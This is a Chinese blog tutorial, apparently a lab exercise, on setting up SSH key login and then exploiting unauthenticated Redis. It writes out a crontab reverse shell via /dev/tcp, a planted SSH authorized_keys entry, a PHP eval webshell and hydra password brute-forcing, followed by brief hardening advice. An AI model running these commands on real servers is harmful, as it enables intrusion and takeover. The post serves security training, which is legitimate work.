未授权访问

最新推荐文章于 2022-04-25 17:44:00 发布
最新推荐文章于 2022-04-25 17:44:00 发布
阅读量850 收藏
点赞数
分类专栏: 安全 文章标签: 安全漏洞 未授权访问
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45149707/article/details/108227398
版权

文章目录

SSH免登录

linux间SSH免登录

客户端:192.168.100.137 ==> 用于生成公钥私钥

服务端:192.168.100.134 ==> 用于接收公钥

  1. 客户端生成公私钥

    ssh-keygen -t rsa

  2. 上传公钥到服务器

    ssh-copy-id guest@192.168.100.134

  3. 登录(失败则需确认权限)

    ssh root@192.168.100.134

SSH两种验证方式的原理

密码验证方式的原理
  1. 当客户端发起ssh请求,服务器会把自己的公钥发送给用户
  2. 用户会根据服务器发来的公钥对密码进行加密
  3. 加密后的信息回传给服务器,服务器用自己的私钥解密,如果密码正确,则用户登录成功
公钥验证方式的原理

  1. 首先在客户端生成密钥对,并将客户端的公钥拷贝到服务端的authorized_keys目录下

  2. 当客户端发起ssh请求,服务端会随机生成一个字符串,并使用客户端拷贝过来的公钥进行加密,然后发送给客户端

  3. 客户端得到服务端发来的消息后,会使用私钥进行解密,然后将解密后的字符串发送给服务端

  4. 服务端接受到客户端发来的字符串后,跟之前的字符串进行对比,如果一致,就允许免密码登录

xshell使用公私钥连接kali(windows->linux)

  1. 打开xshell,选择工具,选择新建用户密钥生成向导

    在这里插入图片描述

  2. 密钥类型选择RSA,密钥长度选择4096,长度稍大一点更加安全

    在这里插入图片描述

  3. 密钥生成成功,先择下一步

    在这里插入图片描述

  4. 密钥名称建议改成authorized_keys,之后的密钥可以不输,这里的密码是给密钥加密使用的,点击完成

    在这里插入图片描述

  5. 根据图中顺序将公钥保存至本地,保存时将后面的.pub去掉

    在这里插入图片描述

    在这里插入图片描述

  6. 使用lrzsz命令上传至服务器或使用xftp,这里使用xftp

在这里插入图片描述

  1. 将公钥拉至服务器的.ssh目录(没有目录则创建一个),并右击选择更改权限

    在这里插入图片描述

  2. 给authorized_keys文件600权限,.ssh目录700权限

    在这里插入图片描述

  3. 使用xshell连接服务器,选择公钥连接,输入密钥密码,之上设置没有加密码的可以不写

    在这里插入图片描述

  4. 登录成功

    在这里插入图片描述

REDIS未授权访问

redis介绍

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。

Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。

攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。

如果Redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。

安装redis

环境:centOS7

yum install -y wget && wget http://download.redis.io/releases/redis-3.2.0.tar.gz		#安装wget命令并拉取redis安装包
tar -zxvf redis-3.2.0.tar.gz		#解压安装包
cd redis-3.2.0		#进入编译包
yum install -y gcc	#安装gcc编译环境
make				#编译(或make MALLOC=libc)

vim redis.conf 		#修改配置文件,使可以远程访问,建议修改之前备份
bind 127.0.0.1  前面加上#号  
protected-mode  设为no
redis-server redis.conf #重新加载配置文件

#redis-3.2.0目录下,将运行命令放置用户系统命令
cp src/redis-cli /usr/bin && cp src/redis-server /usr/bin
#启动redis-server 
redis-cli -h 192.168.100.137
#若不放置用户系统命令
#需要在redis-3.2.0/src目录下,运行命令 ./redis-cli -h 192.168.63.130

默认的配置是使用6379端口,没有密码。这时候会导致未授权访问然后使用redis权限写文件

redis基本命令

  • 连接redis:

    redis-cli -h 192.168.100.137

  • 查看redis版本信息、一些具体信息、服务器版本信息等等:

    192.168.100.137:6379>info

  • 将变量x的值设为test:

    192.168.100.137:6379>set x "test"

  • 是把整个redis数据库删除,一般情况下不要用!!!

    192.168.100.137:6379>flushall

  • 查看所有键:

    192.168.100.137:6379>KEYS *

  • 获取默认的redis目录、和rdb文件名:可以在修改前先获取,然后走的时候再恢复。

    192.168.100.137:6379>CONFIG GET dir

    192.168.100.137:6379>CONFIG GET dbfilename

    在这里插入图片描述

攻击方法

帮助:https://www.freebuf.com/column/158065.html

攻击机:192.168.100.134 ==>kali

redis服务器:192.168.100.137 ==> miniCentOS7

首先nmap扫描服务器开启端口

利用计划任务执行命令反弹shell

在redis以root权限运行时可以写crontab来执行命令反弹shell

先在自己的服务器上监听一个端口
nc -lvnp 4444
然后执行命令:
root@kali:~# redis-cli -h 192.168.100.137
192.168.100.137:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.100.137/4444 0>&1\n"
OK
192.168.100.137:6379> config set dir /var/spool/cron/
OK
192.168.100.137:6379> config set dbfilename root
OK
192.168.100.137:6379> save
OK

在这里插入图片描述

nc监听端口已经反弹回来shell

在这里插入图片描述

写ssh-keygen公钥然后使用私钥登陆

在以下条件下,可以利用此方法

  1. Redis服务使用ROOT账号启动
  2. 服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。
首先在本地生成一对密钥:  
root@kali:~/.ssh# ssh-keygen -t rsa
然后redis执行命令:
192.168.100.134:6379> config set dir /root/.ssh/
OK
192.168.100.134:6379> config set dbfilename authorized_keys
OK
192.168.100.134:6379> set x "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDSKUq5XlxrvgJm/Akt7sj9aiKySVcgVrvlhrvD9++LK0tIA6MRdVwguWmoK1P1ftFsrx/9HJ0UNfqBt9csCMBn7KdnTEZH0rQvmoVHShmwsqZcOMMZ9/W/B0jFdN6F2mYhlIKWMuC1edd7j4U6mLHR4rwLmsflW/4HbRzZuuzgAEQtJUOo3SvIF59DXiF3ww8FPZtC1fDJm+u/I8N87M8LfPP7qrmIniEx0b28y3e2+dreAJZGqJSc/a6D3EFnZPRBfNzp7xeIBJo3kk9bnU3N8uFO7Uyf4cv/ecwWK3663YxjuFuccm/SUp+ZQakabjIZ+3Cz+uzdztM3YdWW6VdTe1Sw/mfKaWM3C8CObj0Uy3v9JsVzUj4HLbVAstaCc6DeHA5r4cxrfN3OKGxsLci2cU/95fSfkdENL2XwM29Qvbh0NSkkTQKDLuOIsvJFBWYMm2ic8BFzwwWbWYxhEwocakujj3nvnqmLIWtRhMjH2LdHzXAT6iC81bekux5eZrc= guest@kali"
OK
192.168.100.134:6379> save
OK
save后可以直接利用公钥登录ssh  
ssh -i id_rsa root@192.168.100.137

在这里插入图片描述

往web物理路径写webshell

测试环境:apache

当redis权限不高时,并且服务器开着web服务,在redis有web目录写权限时,可以尝试往web路径写webshell

执行以下命令

192.168.100.137:6379> config set dir /var/www/html/
OK
192.168.100.137:6379> config set dbfilename shell.php
OK
192.168.100.137:6379> set x "\n\n\n<?php @eval($_POST['passwd']);?>\n\n\n"
OK
192.168.100.137:6379> save
OK

即可将shell写入web目录(web目录根据实际情况)

在这里插入图片描述

蚁剑连接

在这里插入图片描述

在这里插入图片描述

利用hydra暴力破解redis的密码

使用hydra工具可以对redis进行暴力破解

hydra -P passwd.txt redis://192.168.152.128

安全配置

  • 限制登录ip
  • 添加密码
  • 修改默认端口
Flutter 混合开发 - 03 百度地图定位功能 ios
会煮咖啡的猫咪
08-27 1569
本节目标 创建 ios flutter 插件流程 集成百度定位功能 视频 https://www.bilibili.com/video/BV1HT4y1L73i/ 代码 https://github.com/ducafecat/flutter_baidu_plugin_ducafecat/releases/tag/v1.0.3 百度平台部分 设置 AK https://lbsyun.baidu.com/apiconsole/key#/home 添加应用 查看 Bundle Identif.
【H5调用iOS原生高德定位】
AHekey的博客
04-25 1950
H5调用iOS原生高德定位 一.原生集成iOS SDK流程 1、创建新应用 进入控制台,创建一个新应用。如果您之前已经创建过应用,可直接跳过这个步骤。 2、添加新Key 在创建的应用上点击"添加新Key"按钮,在弹出的对话框中,依次:输入应用名名称,选择绑定的服务为“iOS平台SDK”,输入安全码 Bundle ID。 需要注意的是: 1个KEY只能用于一个应用(多渠道安装包属于多个应用),1个Key在多个应用上使用会出现服务调用失败。 在阅读完高德地图API服务条款后,勾选此选项,点击“提交”,完成 Ke
iOS 关于iOS8地图定位问题
zzzzzdddddxxxxx的专栏
11-20 661
今天把xcode升级到了6.0.1,心里很美啊,终于可以把bate版本的删除掉了!我是个整洁的人有强迫证你懂得,不喜欢重复冗杂的东西。升级完后继续码吧,结果发现百度地图无法定位了!本来就不太熟悉地图sdk的开发这下可咋整!关于iOS8地图定位问题" title="iOS 关于iOS8地图定位问题" style="margin:0px; padding:0px; border:0px; list-s
IOS8地图定位
changcunyuan的专栏
10-20 454
系统升级IOS8之后,存在地图定位不到的情况,IOS系统
百度地图 iOS SDK - iOS8下使用百度地图SDK定位的问题
凌晨零点零零
10-10 6777
苹果召开了新产品的发布会,iOS
iOS开发中解决iOS8无法定位的问题
奋斗小青年的博客
10-07 454
升级iOS 8后,将无法定位,特给出解决方案。 1.在Plist中追加下字段NSLocationWhenInUseUsageDescription或NSLocationAlwaysUsageDescription(这两个字段必须有其中一个,内容是系统alert的文言,文言可为空) ,如下图所示: WhenInUse是应用在前台的时候可以搜到更新的位置信息,Always是除了应用在前台,应用在后
iOS-定位
GuangdongQi
11-18 2975
一、前言 大数据时代,用户对自己的隐私安全越来越关注,所以,随着iOS系统更新,苹果对用户隐私相关(定位、相册、网络、粘贴板等)权限控制持续升级。其中定位权限相关申请API与配置项较多,本文旨在记录说明 iOS8.0 - 14.0beta 从权限申请到获取定位数据流程。 内容包括定位权限、获取定位数据、定位权限API调用实践。定位权限模块按照系统相关性分别介绍该系统下权限配置与API调用细节、注...
关于iOS地图定位新问题
chentsingkj的专栏
12-26 615
iOS6之前,对于地图的定位使用CLLocationManager来创建位置管理器,而今年当苹果官方升级之后,这就需要开发者们自己来打开位置管理,然后使用代码来实现. 更新之后,如果我们不进行添加缺省字符串,那么Xcode将会报错:Trying to start MapKit location updates without prompting for location authorizati
ios百度地图api定位不成功原因
cbbing的专栏
11-24 4690
由于系统原因,iOS不允许使用第三方定位,因此地图SDK中的定位方法,本质上是对原生定位的二次封装。通过封装,开发者可更便捷的使用。此外,地图SDK中还提供了相应的定位图层(支持定位三态效果),帮助开发者显示当前位置信息。 注:自iOS8起,系统定位功能进行了升级,SDK为了实现最新的适配,自v2.5.0起也做了相应的修改,开发者在使用定位功能之前,需要在info.plist里添加(以下二选
iOS101-解决升级Xcode10后报错问题(包括地图定位闪退问题)
IOT_LI的专栏
12-17 1092
麻辣个巴子,升级Xcode10后,程序报很多错,有些链接库都直接删掉了,妹的,美国佬太任性了!以下讲讲Xcode10下配置: 1、手动导入下面这个链接库   2、添加支持iPhone5s的arm64配置   3、前往文件夹,删除里面所有内容,clean,编译 ~/资源库/Developer/Xcode/DerivedData   4、解决百度地图定位报错 报错: ***...
移动端H5调用高德地图API获取定位ios端问题
fakeeel的博客
08-18 4043
在移动端h5的开发中遇到了使用高德地图的API获取定位的问题。在安卓端没有问题,但在ios上不能正常弹出位置授权窗口。查阅文档并实际尝试后找到如下原因和解决方案。 问题 iOS 11 操作系统的一大特性是对 http 形式访问页面的限制变得非常严格(相比iOS 10 和 iOS 9)。而高德提供的JS API功能均支持http和https两种协议访问,在iOS 11操作系统上推荐使用https形式访问功能页面和接口。 解决方案 先将高德地图的JS API的版本升级到1.4.1版本以上 然
总结适配IOS10开发需要注意的问题
08-31
8. **地图服务和定位服务**: iOS 10的地图框架有所更新,开发者需检查并更新地图相关的代码,以利用新特性。定位服务的权限也变得更严格,需在info.plist中添加相应的权限描述。 9. **Swift语言更新**: 如果...
iOS调用第三方应用地图
11-22
5. **版本更新**:密切关注第三方地图SDK的更新,及时升级以获取最新功能和修复已知问题。 通过以上方法,开发者可以在iOS应用中灵活调用各种第三方地图服务,为用户提供丰富的地图功能。在MapDemo项目中,你可以...
新版iOS高德3D地图体验升级
综上所述,新版高德地图iOS平台上的集成和使用涉及到了一系列的技术点,包括iOS应用开发、3D图形渲染、地图服务的集成优化等。开发者需要对这些技术点有深入的理解,才能充分利用新版高德3D地图提供的强大功能,为...
化工仪表及自动化讲稿.doc
最新发布
05-28
化工仪表及自动化讲稿.doc
【智能移动机器人领域】2025智能移动机器人电机与减速机产品发展蓝皮书:市场现状、趋势及应用前景分析书由新战略
05-28
内容概要:《2025智能移动机器人电机与减速机产品发展蓝皮书》由新战略移动机器人产业研究所根据CMR产业联盟统计数据编写,涵盖了国内外超30家电机及减速机企业的业务数据和移动机器人本体企业应用现状的综合分析。报告指出,2024年中国智能移动机器人电机市场规模约为11.6亿元,销售量约105万台,其中轮式移动机器人占比最大,达62.80%。未来市场将呈现“人形机器人引领增长、工业AGV/AMR稳健扩容、商用服务机器人快速渗透”的格局,预计到2030年人形机器人将占据大部分市场。智能移动机器人动力系统将朝着“更高效、更聪明、更绿色”的方向发展,推动机器人从“工具”向“智能体”转变。; 适合人群:从事智能移动机器人及相关领域的研发人员、投资者、电机及减速机厂商等专业人士。; 使用场景及目标:①帮助本体企业进行产品选型;②为投资方提供市场趋势和投资机会的参考;③指导电机及减速机厂商制定发展战略和市场布局。; 其他说明:蓝皮书的数据来源于国内外超过30家电机及减速机企业和超过35家机器人企业的调研,采用多种调研方式确保数据的准确性和可靠性。报告覆盖了工业移动机器人(AGV/AMR)、人形机器人及商用服务机器人等领域,不包括家用扫地机器人和农业机器人。
论文模板-html5蓝色智能电子产品网站源码-实训商业源码.zip
05-28
论文模板-html5蓝色智能电子产品网站源码-实训商业源码.zip
基于内容的新闻推荐系统——Java EE技术栈下TF-IDF与余弦相似度算法的应用 全集
05-28
内容概要:本文介绍了基于内容的新闻推荐系统的技术实现与功能特点。该系统主要采用Java EE技术栈,包括Java、Eclipse、MySQL、Spring、SpringMVC、Mybatis等技术,结合TF-IDF算法和余弦相似度算法,通过对用户浏览行为的分析,挖掘用户的兴趣偏好,为用户提供个性化新闻推荐。系统分为前台和后台两大功能模块,前台提供新闻分类查看、详情阅读、评论互动等功能,后台支持系统设置、用户管理、新闻管理等操作。项目的完整源码、数据库及相关文档均包含在内,便于部署和二次开发。 适合人群:对Java EE技术栈有一定了解的研发人员和技术爱好者。 使用场景及目标:适用于希望深入了解基于内容的推荐算法及其实际应用的开发者,尤其是那些想要构建类似新闻推荐系统的团队。通过学习该项目,能够掌握推荐系统的架构设计、算法实现及前后台功能开发。 阅读建议:建议读者先熟悉Java EE相关技术和推荐算法的基本概念,再逐步深入研究项目源码和文档,结合实际运行环境进行实践探索。
基于概率序列处理的微电网优化:考虑风光不确定性与机会约束的MATLAB实现 · 微电网 高效版
05-28
内容概要:本文详细介绍了如何在微电网优化中处理风光不确定性的问题。文中首先阐述了风光不确定性带来的挑战,接着引入了机会约束和概率序列的概念,作为描述和处理不确定性的数学工具。随后,文章深入解析了一段基于MATLAB环境并使用CPLEX求解器的代码,该代码通过构建数学模型,定义目标函数和约束条件,最终实现了对风光不确定性的有效处理和优化。最后,文章强调了这段代码的学习价值,鼓励研究者借鉴其方法,进一步探索和完善微电网优化策略。 适合人群:从事微电网研究和技术开发的专业人士,尤其是那些关注可再生能源不确定性和优化算法的研究者。 使用场景及目标:适用于希望深入了解微电网优化中不确定性处理方法的研究者和技术人员,旨在提高微电网系统的稳定性和可靠性。 阅读建议:读者可以通过学习这段代码,掌握如何将机会约束和概率序列应用于实际问题中,同时也可以将其作为一个参考范例,启发更多创新的方法和策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值